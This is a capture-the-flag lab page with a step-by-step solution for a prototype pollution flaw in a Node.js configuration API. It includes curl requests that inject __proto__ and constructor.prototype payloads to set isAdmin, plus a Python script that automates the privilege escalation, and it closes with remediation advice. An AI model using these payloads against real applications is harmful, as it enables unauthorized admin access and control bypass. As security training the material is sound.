Labs / Prototype Pollution Hunter
- Challenge
- Released 24 Sep 2025
🧬 Can you pollute the prototype chain to break application security?
This cutting-edge Node.js API handles user configuration with sophisticated object merging, but a subtle flaw in property handling creates a dangerous attack vector. 🔬 Modern applications rely heavily on dynamic object manipulation, making prototype pollution one of the most critical vulnerabilities in JavaScript environments. Master this advanced exploitation technique and discover how a single malicious property can compromise an entire application's security model! 🎯
Start Lab Environment
🧬 Prototype Pollution Hunter - Complete Solution
🔍 Step 1: Initial API Analysis
Navigate to http:// to access the ConfigAPI application. The interface displays:
- Welcome Message: "ConfigAPI - User Configuration Management"
- API Documentation: Available endpoints and their purposes
- User Context: Currently authenticated as a regular user
- Configuration Panel: Interface to update user preferences
- Status Display: Current user permissions and access level
The application provides a REST API for managing user configurations with JSON-based data processing.
🔍 Step 2: Understanding Prototype Pollution
Prototype pollution is a JavaScript vulnerability where attackers can modify Object.prototype or other built-in prototypes. This occurs when applications merge user input into objects without proper validation:
# Vulnerable pattern:
function merge(target, source) {
for (let key in source) {
if (typeof source[key] === 'object') {
target[key] = merge(target[key] || {}, source[key]);
} else {
target[key] = source[key];
}
}
return target;
}
# Problem: No validation of key names!
Key concepts:
- Prototype Chain: JavaScript objects inherit from Object.prototype
- Property Traversal: Keys like "__proto__" or "constructor.prototype" can modify prototypes
- Global Impact: Polluted prototypes affect all objects in the application
- Security Bypass: Can override security checks and access controls
🔍 Step 3: API Endpoint Discovery
Explore the available API endpoints:
# Get current configuration
curl "http:///api/config"
# Update user configuration
curl -X POST "http:///api/config" \
-H "Content-Type: application/json" \
-d '{"theme": "dark", "language": "en"}'
# Check user status
curl "http:///api/status" Normal API responses show:
- Current user configuration settings
- User permission level (typically "user")
- Available configuration options
- Access control status
🔍 Step 4: Testing for Prototype Pollution
Test if the configuration endpoint is vulnerable to prototype pollution:
# Test basic prototype pollution
curl -X POST "http:///api/config" \
-H "Content-Type: application/json" \
-d '{"__proto__": {"polluted": true}}'
# Test constructor.prototype pollution
curl -X POST "http:///api/config" \
-H "Content-Type: application/json" \
-d '{"constructor": {"prototype": {"polluted": true}}}' 🔍 Step 5: Identifying Security Properties
Analyze the application to identify security-relevant properties that could be polluted:
# Check if isAdmin property exists
curl "http:///api/status"
# Look for access control properties
curl "http:///api/admin" # Should return 403 Common security properties to target:
- isAdmin: Administrative access flag
- role: User role designation
- permissions: Access control array
- authenticated: Authentication status
🔍 Step 6: Exploiting with Admin Privilege Escalation
Attempt to pollute the prototype with administrative privileges:
# Method 1: Direct __proto__ pollution
curl -X POST "http:///api/config" \
-H "Content-Type: application/json" \
-d '{"__proto__": {"isAdmin": true}}'
# Method 2: Constructor.prototype pollution
curl -X POST "http:///api/config" \
-H "Content-Type: application/json" \
-d '{"constructor": {"prototype": {"isAdmin": true}}}'
# Method 3: Nested object pollution
curl -X POST "http:///api/config" \
-H "Content-Type: application/json" \
-d '{"settings": {"__proto__": {"isAdmin": true}}}' 🔍 Step 7: Verifying Privilege Escalation
Check if the prototype pollution successfully granted administrative access:
# Check updated status
curl "http:///api/status"
# Try accessing admin endpoint
curl "http:///api/admin"
# Test admin functionality
curl "http:///api/admin/users" Successful exploitation should show:
- User status changed to "admin" or "administrator"
- Access to previously restricted endpoints
- Administrative functionality now available
- Flag exposure through admin endpoints
🔍 Step 8: Flag Discovery Methods
Once administrative access is achieved, the flag becomes accessible through multiple methods:
# Method 1: Admin status endpoint
curl "http:///api/admin/status"
# Method 2: System information endpoint
curl "http:///api/admin/system"
# Method 3: Visit admin panel in browser
# Navigate to http:///admin The admin endpoints reveal system information including the security flag when proper administrative privileges are detected.
🔍 Step 9: Advanced Prototype Pollution Techniques
Alternative exploitation methods for different scenarios:
# JSON path traversal
curl -X POST "http:///api/config" \
-H "Content-Type: application/json" \
-d '{"user": {"preferences": {"__proto__": {"isAdmin": true}}}}'
# Multiple property pollution
curl -X POST "http:///api/config" \
-H "Content-Type: application/json" \
-d '{"__proto__": {"isAdmin": true, "role": "admin", "permissions": ["all"]}}' 🔍 Step 10: Python Script for Automated Exploitation
Automated script for prototype pollution testing:
import requests
import json
def test_prototype_pollution(target_url):
base_url = f"http://{target_url}"
# Test different pollution payloads
payloads = [
{"__proto__": {"isAdmin": True}},
{"constructor": {"prototype": {"isAdmin": True}}},
{"settings": {"__proto__": {"isAdmin": True}}}
]
for payload in payloads:
response = requests.post(f"{base_url}/api/config", json=payload)
print(f"Payload: {payload}")
print(f"Response: {response.status_code}")
# Check if admin access granted
status = requests.get(f"{base_url}/api/status")
if "admin" in status.text.lower():
print("✅ Admin access achieved!")
admin_response = requests.get(f"{base_url}/api/admin")
print(f"Admin endpoint: {admin_response.status_code}")
break
test_prototype_pollution("<target-ip>")
🔍 Real Prototype Pollution Analysis
This challenge demonstrates a genuine prototype pollution vulnerability:
Vulnerability Details:
- Unsafe Object Merging: No validation of property names during merge
- Prototype Chain Access: Direct manipulation of __proto__ and constructor.prototype
- Global Scope Impact: Polluted properties affect all object instances
- Security Control Bypass: Administrative checks rely on pollutable properties
Attack Vectors:
- JSON API Exploitation: Malicious payloads in configuration updates
- Nested Object Pollution: Deep property traversal attacks
- Multiple Pollution Points: Various prototype access methods
- Privilege Escalation: Security property manipulation
🛡️ Security Implications and Remediation
Security Risks:
- Privilege escalation and access control bypass
- Application-wide security model compromise
- Data integrity and confidentiality violations
- Potential remote code execution in some contexts
Remediation Strategies:
- Implement proper input validation and sanitization
- Use Object.create(null) for safe object creation
- Validate property names against allow-lists
- Use Map objects instead of plain objects for dynamic data
📚 Key Learning Points
- Prototype Pollution Understanding: JavaScript prototype chain manipulation techniques
- Modern API Security: Vulnerabilities in Node.js and JSON processing
- Object Safety: Secure patterns for dynamic object manipulation
- Input Validation: Critical importance of property name validation
- Privilege Escalation: How prototype pollution enables access control bypass